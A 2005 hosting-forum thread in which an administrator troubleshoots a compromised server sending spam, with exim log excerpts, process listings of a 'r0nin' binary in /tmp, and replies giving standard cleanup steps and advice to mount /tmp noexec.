Server spewing TONS of mail

K

keefe007

Verified User
Joined
Dec 25, 2004
Messages
276
One of my DA servers seems to be spewing a crap-load of mail today. Perhaps someone is trying some sort of attack or the server got infected with something.

Right now I have about 40-50 exim processes going.

Here's what the mainlog says:

Code: 
2005-11-06 02:53:11 1EYgGk-0004Ro-EO => apache <[email protected]> F=<> R=localuser T=local_delivery S=5050
2005-11-06 02:53:11 1EYgGy-0004V2-TJ <= [email][email protected][/email] U=apache P=local S=2745 T="Estou com Saudades de voc\352!!!" from <[email protected]> for [email][email protected][/email]
2005-11-06 02:53:11 1EYgGy-0004V0-Jo <= [email][email protected][/email] U=apache P=local S=5602 T="Eu te Amo!!! \266\330\277?\277" from <[email protected]> for [email][email protected][/email]
2005-11-06 02:53:12 1EYgGw-0004Uh-5s Completed
2005-11-06 02:53:12 1EYgGw-0004Uk-AA ** [email][email protected][/email] F=<[email protected]>: Unrouteable address
2005-11-06 02:53:12 1EYgH0-0004VB-0m <= <> R=1EYgGt-0004UC-2Z U=mail P=local S=6313 T="Mail delivery failed: returning message to sender" from <> for [email][email protected][/email]
2005-11-06 02:53:12 1EYgGx-0004Ux-G5 ** [email][email protected][/email] F=<[email protected]> R=lookuphost T=remote_smtp: retry time not reached for any host after a long failure period
2005-11-06 02:53:12 1EYgH0-0004VE-4O <= [email][email protected][/email] U=apache P=local S=5615 T="Te amooo" from <[email protected]> for [email][email protected][/email]
2005-11-06 02:53:12 1EYgGk-0004Ro-EO Completed
2005-11-06 02:53:12 1EYgGt-0004UE-3D ** [email][email protected][/email] F=<[email protected]> R=lookuphost T=remote_smtp: SMTP error from remote mail server after RCPT TO:<[email protected]>: host mx.br.inter.net [200.142.77.19]: 550 unknown user
2005-11-06 02:53:12 1EYgGv-0004UZ-Er == [email][email protected][/email] R=lookuphost T=remote_smtp defer (-44): SMTP error from remote mail server after RCPT TO:<[email protected]>: host mx.uol.com.br [200.221.4.129]: 450 Client host rejected: cannot find your hostname, [64.242.222.170]
2005-11-06 02:53:12 1EYgH0-0004VI-BI <= <> R=1EYgGu-0004US-Cr U=mail P=local S=11062 T="Mail delivery failed: returning message to sender" from <> for [email][email protected][/email]

Anyone know wtf is going on here?
 
I would say someone uploaded a script to send Spam.

Check you /tmp for strange files

# ls -la /tmp

should also display hidden directories

If you find something suspisious check to see if it's loaded in memory...

# ps aux | grep <what you found>

Kill the process and remove it from /tmp

Check to see if the email is still being sent, if not you've probably found the culprit, now you need to find the offending website... Look through all the apache logs for <what you found>, this site probably has an unsafe file-upload script.

Make sure you mount /tmp in NONEXEC mode to prevent this in the future...
 
I think I found the offender.

Code: 
apache   17107  0.0  0.0   1444   304 ?        Ss   Oct21   0:00 ./r0nin
apache    7577  0.0  0.0   1444   348 ?        R    Nov04   0:03 ./r0nin
apache   17619  0.0  0.0   1444   348 ?        R    Nov04   0:02 ./r0nin
apache   14554  0.0  0.0   1444   348 ?        S    Nov04   0:01 ./r0nin
apache   12781  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
apache   31294  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
apache   32188  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
apache   13659  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
apache   31141  0.0  0.0   1444   348 ?        S    Nov05   0:00 ./r0nin
root     27838  0.0  0.0   1824   608 pts/2    R+   03:10   0:00 grep r0nin
seraph:/tmp#

Only problem is that he processes don't seem to go away once I kill them. Any ideas?
 
Try

# kill -9 <process id> ..... <process id>

You can enter all process id's into a single line as long as you have a space inbetween.
 
Alright I seem to have them all gone and the r0nin files in /tmp have been deleted.

I do see something suspicious though...One user has about 200 IMAPD connections open right now. What could be causing that?
 
And to keep from having it happen account, make sure your /tmp directory is on it's own partition, and marked noexec.

You can find some information searching for "noexec" (without the quotes) on these forums.

Yes, we can do it, but as I've said before, we're expensive.

:cool:

Jeff
 
You must log in or register to reply here.
Back
Top